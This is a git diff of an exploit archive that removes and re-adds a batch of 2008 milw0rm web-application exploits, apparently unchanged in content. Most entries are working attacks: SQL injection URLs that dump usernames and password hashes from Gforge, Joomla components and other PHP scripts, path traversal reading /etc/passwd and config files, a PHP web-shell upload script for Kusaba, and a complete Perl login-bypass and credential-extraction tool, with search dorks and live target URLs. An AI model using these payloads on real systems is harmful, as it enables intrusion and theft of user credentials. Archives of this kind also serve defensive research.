6e90c99a1..6cd0b351d 100755 --- a/platforms/php/webapps/6706.php 
+++ b/platforms/php/webapps/6706.php 
@@ -1,65 +1,65 @@ - - -After execution: -http://www.kusaba.image.board/url/kasubaoek/oekaki.php?pc=print "Hello"; -http://www.kusaba.image.board/url/kasubaoek/oekaki.php?sc=echo Hello -**********************************/ - -$shellname = 'oekaki.php'; // any filename ending in php -$server = 'http://www.kusaba.image.board/url/'; // BBS website, with -trailing slash -$image = file_get_contents('test.jpg'); // image to upload (any valid -picture) -$magicquotes = true; - -if ($magicquotes) -{ - $shellcode = << 'what this is for', -); - -function build_data($adata) -{ - $data = ''; - foreach ($adata as $k => $v) - { - $data .= "$k=$v;"; - } - return substr($data,0,-1); -} - -function data_len($data) -{ - return str_pad(strlen($data),8,'0',STR_PAD_LEFT); -} - -$request = new -HttpRequest($server.'paint_save.php?applet=shipainter&saveid='.$shellname.'%00',HttpRequest::METH_POST); -$data = build_data($adata); -$imagedata = $image; -$animationdata = $shellcode; -$request->setRawPostData("S".data_len($data).$data.data_len($imagedata).'xx'.$imagedata.data_len($animationdata).$animationdata); - -echo $request->send()->getBody(); - -# milw0rm.com [2008-10-09] + + +After execution: +http://www.kusaba.image.board/url/kasubaoek/oekaki.php?pc=print "Hello"; +http://www.kusaba.image.board/url/kasubaoek/oekaki.php?sc=echo Hello +**********************************/ + +$shellname = 'oekaki.php'; // any filename ending in php +$server = 'http://www.kusaba.image.board/url/'; // BBS website, with +trailing slash +$image = file_get_contents('test.jpg'); // image to upload (any valid +picture) +$magicquotes = true; + +if ($magicquotes) +{ + $shellcode = << 'what this is for', +); + +function build_data($adata) +{ + $data = ''; + foreach ($adata as $k => $v) + { + $data .= "$k=$v;"; + } + return substr($data,0,-1); +} + +function data_len($data) +{ + return str_pad(strlen($data),8,'0',STR_PAD_LEFT); +} + +$request = new 
+HttpRequest($server.'paint_save.php?applet=shipainter&saveid='.$shellname.'%00',HttpRequest::METH_POST); +$data = build_data($adata); +$imagedata = $image; +$animationdata = $shellcode; +$request->setRawPostData("S".data_len($data).$data.data_len($imagedata).'xx'.$imagedata.data_len($animationdata).$animationdata); + +echo $request->send()->getBody(); + +# milw0rm.com [2008-10-09] diff --git a/platforms/php/webapps/6707.txt b/platforms/php/webapps/6707.txt index c6b42a4ac..e4cb16986 100755 --- a/platforms/php/webapps/6707.txt +++ b/platforms/php/webapps/6707.txt 
@@ -1,16 +1,15 @@ - - -Gforge <= 4.5.19 Multiple Sql Injections - -Vendor Notified: 2008-10-06 -Note: should work regardless magic_quotes_gpc setting. - -http://gforgesite.xxx/new/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summary -http://gforgesite.xxx/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users -http://gforgesite.xxx/top/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5; - -Replace 1337 with a valid group_id: - -http://gforgesite.xxx/frs/shownotes.php?release_id=*/+--+454&pub_sql=;select+1+as+is_public,1337+as+group_id,current_user+as+name,4+as+notes,version()+as+changes,6;/* - -# milw0rm.com [2008-10-09] + +Gforge <= 4.5.19 Multiple Sql Injections + +Vendor Notified: 2008-10-06 +Note: should work regardless magic_quotes_gpc setting. + +http://gforgesite.xxx/new/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summary +http://gforgesite.xxx/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users +http://gforgesite.xxx/top/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5; + +Replace 1337 with a valid group_id: + +http://gforgesite.xxx/frs/shownotes.php?release_id=*/+--+454&pub_sql=;select+1+as+is_public,1337+as+group_id,current_user+as+name,4+as+notes,version()+as+changes,6;/* + +# milw0rm.com [2008-10-09] diff --git a/platforms/php/webapps/6708.txt b/platforms/php/webapps/6708.txt index 30eaae387..c2443d171 100755 --- a/platforms/php/webapps/6708.txt +++ b/platforms/php/webapps/6708.txt 
@@ -1,12 +1,11 @@ - -Gforge <= 4.6 rc1 skill_edit SQL injection - -Vendor Notified: 2008-10-06 -Impact: zomg! -Note: should work regardless magic_quotes_gpc setting. -Requires: Creating an account and be logged in -Vulnerable function: handle_multi_edit($skill_ids) on /www/people/skills_utils.php - -http://gforge.site/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit - -# milw0rm.com [2008-10-09] +Gforge <= 4.6 rc1 skill_edit SQL injection + +Vendor Notified: 2008-10-06 +Impact: zomg! +Note: should work regardless magic_quotes_gpc setting. +Requires: Creating an account and be logged in +Vulnerable function: handle_multi_edit($skill_ids) on /www/people/skills_utils.php + +http://gforge.site/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit + +# milw0rm.com [2008-10-09] diff --git a/platforms/php/webapps/6709.txt b/platforms/php/webapps/6709.txt index 955609a8b..91233a419 100755 --- a/platforms/php/webapps/6709.txt +++ b/platforms/php/webapps/6709.txt 
@@ -1,51 +1,51 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# d3hydr8 - rsauron - baltazar - C1c4Tr1Z - beenu - P47tr1ck # -# and all darkc0de members # -################################################################ -# -# Author: rsauron -# -# Home : www.darkc0de.com -# -# Email : rsauron@gmail.com -# -# Share the c0de! -# -################################################################ -# -# Type: Joomla Component com_joomtracker Remote SQL Injection Vulnerability -# -# Title: Joomtracker XBT external bittorrent tracker -# -# Vendor: http://www.joomtracker.org/ -# -################################################################ -# -# d0rk: "Powered by Joomtracker" -# -################################################################ - POC :- - - index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/* - - Live Demo: - - http://www.joomtracker.org/index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/* - -################################################################ -# Bug discovered : 08 Oct.2008 -################################################################ - -# milw0rm.com [2008-10-09] 
+################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# d3hydr8 - rsauron - baltazar - C1c4Tr1Z - beenu - P47tr1ck # +# and all darkc0de members # +################################################################ +# +# Author: rsauron +# +# Home : www.darkc0de.com +# +# Email : rsauron@gmail.com +# +# Share the c0de! +# +################################################################ +# +# Type: Joomla Component com_joomtracker Remote SQL Injection Vulnerability +# +# Title: Joomtracker XBT external bittorrent tracker +# +# Vendor: http://www.joomtracker.org/ +# +################################################################ +# +# d0rk: "Powered by Joomtracker" +# +################################################################ + POC :- + + index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/* + + Live Demo: + + http://www.joomtracker.org/index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/* + +################################################################ +# Bug discovered : 08 Oct.2008 +################################################################ + +# milw0rm.com [2008-10-09] 
diff --git a/platforms/php/webapps/6710.txt b/platforms/php/webapps/6710.txt index cad3cadfc..d0fcdee15 100755 --- a/platforms/php/webapps/6710.txt +++ b/platforms/php/webapps/6710.txt @@ -1,16 +1,16 @@ -Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities -Script:Cameralife 2.6.2b4 -Download:http://nchc.dl.sourceforge.net/sourceforge/fdcl/cameralife-2.6.2b4.zip -Author:BackDoor -Bug 1;album.php Remote SQL Injection Vulnerability -Exploit:www.target.com/scriptpath/album.php?id=-1+union+select+0,password,username,3,4,5+from+users -Live -http://chrisnolan.org/cameralife/album.php?id=-1+union+select+0,password,username,3,4,5+from+users -Bug 2;topic.php XSS Vulnerability -Exploit:www.target.com/scriptpath/topic.php?name="> -Live -http://chrisnolan.org/cameralife/topic.php?name="> -Dork:inurl:"cameralife/index.php" -BackDoor Cyber-Security.TIM //Lojistik - -# milw0rm.com [2008-10-09] +Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities +Script:Cameralife 2.6.2b4 +Download:http://nchc.dl.sourceforge.net/sourceforge/fdcl/cameralife-2.6.2b4.zip +Author:BackDoor +Bug 1;album.php Remote SQL Injection Vulnerability +Exploit:www.target.com/scriptpath/album.php?id=-1+union+select+0,password,username,3,4,5+from+users +Live +http://chrisnolan.org/cameralife/album.php?id=-1+union+select+0,password,username,3,4,5+from+users +Bug 2;topic.php XSS Vulnerability +Exploit:www.target.com/scriptpath/topic.php?name="> +Live +http://chrisnolan.org/cameralife/topic.php?name="> +Dork:inurl:"cameralife/index.php" +BackDoor Cyber-Security.TIM //Lojistik + +# milw0rm.com [2008-10-09] diff --git a/platforms/php/webapps/6712.txt b/platforms/php/webapps/6712.txt index 74d283d17..b6879f6cf 100755 --- a/platforms/php/webapps/6712.txt +++ b/platforms/php/webapps/6712.txt 
@@ -1,45 +1,45 @@ -|___________________________________________________| -| -| Arad Center (news.php id) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|-------------------- Hussin X -------------------| -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -|___________________________________________________ -| | -| -| script : http://www.iranmc.com/shop.php -| -| DorK : "Designed & Developed by N.E.T E-Commerce Group. All Rights Reserved." -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/news.php?id=-1+union+select+0,0,concat(user,0x3e,pass),4+from+user-- - - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab -|_____________________________________________________________________ - - - Im IRAQi | Im TrYaGi - -# milw0rm.com [2008-10-09] +|___________________________________________________| +| +| Arad Center (news.php id) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|-------------------- Hussin X -------------------| +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +|___________________________________________________ +| | +| +| script : http://www.iranmc.com/shop.php +| +| DorK : "Designed & Developed by N.E.T E-Commerce Group. All Rights Reserved." 
+|___________________________________________________| + +Exploit: +________ + + + +www.[target].com/Script/news.php?id=-1+union+select+0,0,concat(user,0x3e,pass),4+from+user-- + + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab +|_____________________________________________________________________ + + + Im IRAQi | Im TrYaGi + +# milw0rm.com [2008-10-09] diff --git a/platforms/php/webapps/6713.txt b/platforms/php/webapps/6713.txt index d6b29d04b..bab7f441d 100755 --- a/platforms/php/webapps/6713.txt +++ b/platforms/php/webapps/6713.txt 
@@ -1,28 +1,28 @@ -# ScriptsEz Mini Hosting Panel (members.php) Local File Inclusion Vulnerability -# url: http://www.scriptsez.net/ -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. - -vuln file: members.php - -PoC: /members.php?act=view&p=[FILE]&dir=[DIR] -Exploits: -/etc/passwd/ --> /members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/ -conf.php --> /members.php?act=view&p=conf.php&dir=/test/../../.. - -live demo: -http://hosting.cgixp.apkafuture.com/index.php?action=login -demo:demo (user login) - -http://hosting.cgixp.apkafuture.com/members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/ -http://hosting.cgixp.apkafuture.com/members.php?act=view&p=conf.php&dir=/test/../../.. - -Ingenious work :D - -# milw0rm.com [2008-10-09] +# ScriptsEz Mini Hosting Panel (members.php) Local File Inclusion Vulnerability +# url: http://www.scriptsez.net/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. + +vuln file: members.php + +PoC: /members.php?act=view&p=[FILE]&dir=[DIR] +Exploits: +/etc/passwd/ --> /members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/ +conf.php --> /members.php?act=view&p=conf.php&dir=/test/../../.. + +live demo: +http://hosting.cgixp.apkafuture.com/index.php?action=login +demo:demo (user login) + +http://hosting.cgixp.apkafuture.com/members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/ +http://hosting.cgixp.apkafuture.com/members.php?act=view&p=conf.php&dir=/test/../../.. + +Ingenious work :D + +# milw0rm.com [2008-10-09] 
diff --git a/platforms/php/webapps/6714.pl b/platforms/php/webapps/6714.pl
index a070a8b80..1280a88b0 100755
--- a/platforms/php/webapps/6714.pl
+++ b/platforms/php/webapps/6714.pl
@@ -1,113 +1,113 @@ -#!/usr/bin/perl -w -# -# User credentials disclosure exploit - stash103exp.pl -# -# Gnix -# http://gnix.netsons.org -# -# This exploit use an SQL Injection in the file admin/login.php to -# bypass the login, and then an SQL Injection in the admin/news.php -# to extract all the users info. Note: password are crypted with md5. -# -# Output for each user: -# user_id:user_username:user_password:user_key:user_firstname user_lastname:user_email:user_admin -# - -use strict; -use LWP::UserAgent; -use HTTP::Request; -use HTTP::Response; -use HTTP::Cookies; - - -# Variables -my $cjar = new HTTP::Cookies( file => 'cookies.txt', - autosave => 1, - ignore_discard => 0); -my $agent = new LWP::UserAgent; -$agent->agent('Lynxy/6.6.6dev.8 libwww-FM/3.14159FM'); - - -# Check argv -if(@ARGV != 3) { - print "[?] Usage : perl stash103exp.pl \n"; - print "[?] Example: perl stash103exp.pl http://site/stash/ avril st_\n"; - exit(1); -} - - -# Authentication -if(!auth($ARGV[0],$ARGV[1])) { - print "[!] Error during the authentication!\n"; - exit(1); -} - - -# Extract all the user information -my $info = extract_data($ARGV[0],$ARGV[2]); -if(!$info) { - print "[!] 
Error when extracting data!\n"; - exit(1); -} - - -# Print user information -$_ = $info; -my @users = m/<1>(.+?)<2>/g; -foreach my $user (@users) { - print $user."\n"; -} - - -exit(0); - -########################################################################### - - - -# Login as $ARGV[1] and save the PHPSESSID cookie -sub auth -{ - my $address = shift; - my $username= shift; - - # Login - my $response= $agent->post($address.'admin/login.php', - {username => "' OR user_username = '$username", - password => "any", - submit => "Log in"}); - - # Save PHPSESSID cookie - $cjar->extract_cookies($response); - - return $response->is_redirect(); -} - - - -# Inject a query through news.php to extract all the info about every user -sub extract_data -{ - my $address = shift; - my $prefix = shift; - - my $query = "-1 UNION SELECT 1 AS news_id, 'Injection' AS news_title, ". - "CONCAT('<1>',user_id,':',user_username,':',user_password,':',user_key,". - "':',user_firstname,' ', user_lastname,':', user_email,':', user_admin,". - "'<2>') AS news_body, 'Mitnick' AS news_author, NOW() AS news_date, 0 ". - "AS news_comment FROM ".$prefix."news, ".$prefix."user"; - - my $request = new HTTP::Request('GET', $address.'admin/news.php?post='.$query); - - $agent->cookie_jar($cjar); - my $response= $agent->request($request); - - if($response->is_success()) { - return $response->content(); - } - else { - return undef; - } -} - -# milw0rm.com [2008-10-09] +#!/usr/bin/perl -w +# +# User credentials disclosure exploit - stash103exp.pl +# +# Gnix +# http://gnix.netsons.org +# +# This exploit use an SQL Injection in the file admin/login.php to +# bypass the login, and then an SQL Injection in the admin/news.php +# to extract all the users info. Note: password are crypted with md5. 
+# +# Output for each user: +# user_id:user_username:user_password:user_key:user_firstname user_lastname:user_email:user_admin +# + +use strict; +use LWP::UserAgent; +use HTTP::Request; +use HTTP::Response; +use HTTP::Cookies; + + +# Variables +my $cjar = new HTTP::Cookies( file => 'cookies.txt', + autosave => 1, + ignore_discard => 0); +my $agent = new LWP::UserAgent; +$agent->agent('Lynxy/6.6.6dev.8 libwww-FM/3.14159FM'); + + +# Check argv +if(@ARGV != 3) { + print "[?] Usage : perl stash103exp.pl \n"; + print "[?] Example: perl stash103exp.pl http://site/stash/ avril st_\n"; + exit(1); +} + + +# Authentication +if(!auth($ARGV[0],$ARGV[1])) { + print "[!] Error during the authentication!\n"; + exit(1); +} + + +# Extract all the user information +my $info = extract_data($ARGV[0],$ARGV[2]); +if(!$info) { + print "[!] Error when extracting data!\n"; + exit(1); +} + + +# Print user information +$_ = $info; +my @users = m/<1>(.+?)<2>/g; +foreach my $user (@users) { + print $user."\n"; +} + + +exit(0); + +########################################################################### + + + +# Login as $ARGV[1] and save the PHPSESSID cookie +sub auth +{ + my $address = shift; + my $username= shift; + + # Login + my $response= $agent->post($address.'admin/login.php', + {username => "' OR user_username = '$username", + password => "any", + submit => "Log in"}); + + # Save PHPSESSID cookie + $cjar->extract_cookies($response); + + return $response->is_redirect(); +} + + + +# Inject a query through news.php to extract all the info about every user +sub extract_data +{ + my $address = shift; + my $prefix = shift; + + my $query = "-1 UNION SELECT 1 AS news_id, 'Injection' AS news_title, ". + "CONCAT('<1>',user_id,':',user_username,':',user_password,':',user_key,". + "':',user_firstname,' ', user_lastname,':', user_email,':', user_admin,". + "'<2>') AS news_body, 'Mitnick' AS news_author, NOW() AS news_date, 0 ". 
+ "AS news_comment FROM ".$prefix."news, ".$prefix."user"; + + my $request = new HTTP::Request('GET', $address.'admin/news.php?post='.$query); + + $agent->cookie_jar($cjar); + my $response= $agent->request($request); + + if($response->is_success()) { + return $response->content(); + } + else { + return undef; + } +} + +# milw0rm.com [2008-10-09] diff --git a/platforms/php/webapps/6715.txt b/platforms/php/webapps/6715.txt index fc340bc85..dd0c13c3d 100755 --- a/platforms/php/webapps/6715.txt +++ b/platforms/php/webapps/6715.txt @@ -1,18 +1,18 @@ -# ScriptsEz Easy Image Downloader Local File Download Vulnerability -# url: http://www.scriptsez.net/ -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. - -PoC: /main.php?action=download&id=[FILE] -Exploit: /main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd - -live demo: -http://demo.scriptsez.net/easy_image/main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd - -# milw0rm.com [2008-10-09] +# ScriptsEz Easy Image Downloader Local File Download Vulnerability +# url: http://www.scriptsez.net/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. + +PoC: /main.php?action=download&id=[FILE] +Exploit: /main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd + +live demo: +http://demo.scriptsez.net/easy_image/main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd + +# milw0rm.com [2008-10-09] diff --git a/platforms/php/webapps/6721.txt b/platforms/php/webapps/6721.txt index 7d385fa8f..a5c55f407 100755 
--- a/platforms/php/webapps/6721.txt +++ b/platforms/php/webapps/6721.txt @@ -1,21 +1,21 @@ -############### >>> Remote SQL Injection <<< ######### -## SuB-ZeRo CoNsTaTiNe HaCkErS25 walid ## -################## >>> SuB-ZeRo <<< ################ - author : SuB-ZeRo - contact : FbH@hotmail.com - - scrit: forumhost - buy script : http://www.easynet4u.com/easyshop/index.php?do=catalog&c=remotely_hosted_scripts&i=forum_host - dork : find it - exploit: - www.site.me/forumhost/forum.php?user=demo&forum=-7+union+select+1,concat(username,0x3a,password),3,4+from+admin-- - NoTe:in name of demo put eny user you want - L!Ve DeMo - http://www.easynet4u.com/forumhost/forum.php?user=demo&forum=-7+union+select+1,concat(username,0x3a,password),3,4+from+admin-- - NoTe:YoU must singup and login in web sit and you put your exploit -########### Greetz ############# ->>> SuB-ZeRo ->>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4 & bibi-info & crazy-zero ->>> all muslims - -# milw0rm.com [2008-10-10] +############### >>> Remote SQL Injection <<< ######### +## SuB-ZeRo CoNsTaTiNe HaCkErS25 walid ## +################## >>> SuB-ZeRo <<< ################ + author : SuB-ZeRo + contact : FbH@hotmail.com + + scrit: forumhost + buy script : http://www.easynet4u.com/easyshop/index.php?do=catalog&c=remotely_hosted_scripts&i=forum_host + dork : find it + exploit: + www.site.me/forumhost/forum.php?user=demo&forum=-7+union+select+1,concat(username,0x3a,password),3,4+from+admin-- + NoTe:in name of demo put eny user you want + L!Ve DeMo + http://www.easynet4u.com/forumhost/forum.php?user=demo&forum=-7+union+select+1,concat(username,0x3a,password),3,4+from+admin-- + NoTe:YoU must singup and login in web sit and you put your exploit +########### Greetz ############# +>>> SuB-ZeRo +>>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4 & bibi-info & crazy-zero +>>> all muslims + +# milw0rm.com [2008-10-10] 
diff --git a/platforms/php/webapps/6722.txt b/platforms/php/webapps/6722.txt
index 3a1b065bd..d005f3369 100755
--- a/platforms/php/webapps/6722.txt
+++ b/platforms/php/webapps/6722.txt
@@ -1,26 +1,26 @@ - #### # # ###### ########## -# # # # # # # - #### # # # # ######### # # - # # # ##### ######### # # -# # # # # ## ########## - #### ###### ####### -############### >>> Remote SQL Injection <<< ######### -## CoNsTaNtiNe HaCkErS25 ## -################## >>> SuB-ZeRo <<< ################ - author : SuB-ZeRo(AlGeRiA-HaCkErS) - contact : FbH@hotmail.com - homepage: www.no-exploit.com - script : faq_host script - download: http://www.easynet4u.com/easyshop/index.php?do=catalog&c=remotely_hosted_scripts&i=faq_host - dork : find it - exploit: - www.site.me/script/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin-- - L!Ve DeMo - http://www.easynet4u.com/faqs/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin-- - -########### Greetz ############# ->>> SuB-ZeRo ->>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & crazy-zero & bibi-info & HiSoK4 ->>> all muslims - -# milw0rm.com [2008-10-10] + #### # # ###### ########## +# # # # # # # + #### # # # # ######### # # + # # # ##### ######### # # +# # # # # ## ########## + #### ###### ####### +############### >>> Remote SQL Injection <<< ######### +## CoNsTaNtiNe HaCkErS25 ## +################## >>> SuB-ZeRo <<< ################ + author : SuB-ZeRo(AlGeRiA-HaCkErS) + contact : FbH@hotmail.com + homepage: www.no-exploit.com + script : faq_host script + download: http://www.easynet4u.com/easyshop/index.php?do=catalog&c=remotely_hosted_scripts&i=faq_host + dork : find it + exploit: + www.site.me/script/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin-- + L!Ve DeMo + http://www.easynet4u.com/faqs/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin-- + +########### Greetz ############# +>>> SuB-ZeRo +>>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & crazy-zero & bibi-info & HiSoK4 +>>> all muslims + +# milw0rm.com [2008-10-10] 
diff --git a/platforms/php/webapps/6723.txt b/platforms/php/webapps/6723.txt
index 43683b10c..58ab23c6f 100755
--- a/platforms/php/webapps/6723.txt
+++ b/platforms/php/webapps/6723.txt
@@ -1,41 +1,41 @@ -############################################################################# -# # -# Joomla Component Ignite Gallery SQL Injection Vulnerability # -# # -############################################################################# - - -######################################## - -[~] Vulnerability found by: H!tm@N -[~] Contact: hitman[at]khg-crew[dot]ws -[~] Site: www.khg-crew.ws -[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-] - -######################################## - -[~] ScriptName: "Joomla" -[~] Component: "Ignite Gallery (com_ignitegallery)" -[~] Version: "0.8.3" -[~] Author: "Matt Thomson" -[~] Author E-mail: "matt@ignitejoomlaextensions.com" -[~] Author URL: "www.ignitejoomlaextensions.com" - -######################################## - -[~] DORK: inurl:"com_ignitegallery" - -######################################## - -[~] Exploit: /index.php?option=com_ignitegallery&task=view&gallery=[SQL]&Itemid=18 -[~] Example: /index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--&Itemid=18 - -######################################## - -[~] Proud 2 be Albanian -[~] Proud 2 be Muslim -[~] United States of Albania - -######################################## - -# milw0rm.com [2008-10-10] +############################################################################# +# # +# Joomla Component Ignite Gallery SQL Injection Vulnerability # +# # +############################################################################# + + +######################################## + +[~] Vulnerability found by: H!tm@N +[~] Contact: hitman[at]khg-crew[dot]ws +[~] Site: www.khg-crew.ws +[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-] + +######################################## + +[~] ScriptName: "Joomla" +[~] Component: "Ignite Gallery (com_ignitegallery)" +[~] Version: "0.8.3" +[~] Author: "Matt Thomson" +[~] Author E-mail: 
"matt@ignitejoomlaextensions.com" +[~] Author URL: "www.ignitejoomlaextensions.com" + +######################################## + +[~] DORK: inurl:"com_ignitegallery" + +######################################## + +[~] Exploit: /index.php?option=com_ignitegallery&task=view&gallery=[SQL]&Itemid=18 +[~] Example: /index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--&Itemid=18 + +######################################## + +[~] Proud 2 be Albanian +[~] Proud 2 be Muslim +[~] United States of Albania + +######################################## + +# milw0rm.com [2008-10-10] diff --git a/platforms/php/webapps/6724.txt b/platforms/php/webapps/6724.txt index 58c4957a4..0870eacea 100755 --- a/platforms/php/webapps/6724.txt +++ b/platforms/php/webapps/6724.txt 
@@ -1,39 +1,39 @@ -############################################################################# -# # -# Joomla Component Mad4Joomla Mailforms SQL Injection Vulnerability # -# # -############################################################################# - - -######################################## - -[~] Vulnerability found by: H!tm@N -[~] Contact: hitman[at]khg-crew[dot]ws -[~] Site: www.khg-crew.ws -[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-] - -######################################## - -[~] ScriptName: "Joomla" -[~] Component: "Mad4Joomla Mailforms (com_mad4joomla)" -[~] Author: "Dipl. Inf. Fahrettin Kutyol" -[~] Author E-mail: "joomla@mad4media.com" -[~] Author URL: "www.mad4media.de" - -######################################## - -[~] Exploit: /index.php?option=com_mad4joomla&jid=[SQL] - -[~] Example: /index.php?option=com_mad4joomla&jid=-2+union+select+1,concat(username,char(58),password)KHG,3,4+from+jos_users-- - - - -######################################## - -[~] Proud 2 be Albanian -[~] Proud 2 be Muslim -[~] United States of Albania - -######################################## - -# milw0rm.com [2008-10-10] +############################################################################# +# # +# Joomla Component Mad4Joomla Mailforms SQL Injection Vulnerability # +# # +############################################################################# + + +######################################## + +[~] Vulnerability found by: H!tm@N +[~] Contact: hitman[at]khg-crew[dot]ws +[~] Site: www.khg-crew.ws +[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-] + +######################################## + +[~] ScriptName: "Joomla" +[~] Component: "Mad4Joomla Mailforms (com_mad4joomla)" +[~] Author: "Dipl. Inf. 
Fahrettin Kutyol" +[~] Author E-mail: "joomla@mad4media.com" +[~] Author URL: "www.mad4media.de" + +######################################## + +[~] Exploit: /index.php?option=com_mad4joomla&jid=[SQL] + +[~] Example: /index.php?option=com_mad4joomla&jid=-2+union+select+1,concat(username,char(58),password)KHG,3,4+from+jos_users-- + + + +######################################## + +[~] Proud 2 be Albanian +[~] Proud 2 be Muslim +[~] United States of Albania + +######################################## + +# milw0rm.com [2008-10-10] diff --git a/platforms/php/webapps/6728.txt b/platforms/php/webapps/6728.txt index 260a249cb..db9757ca7 100755 --- a/platforms/php/webapps/6728.txt +++ b/platforms/php/webapps/6728.txt 
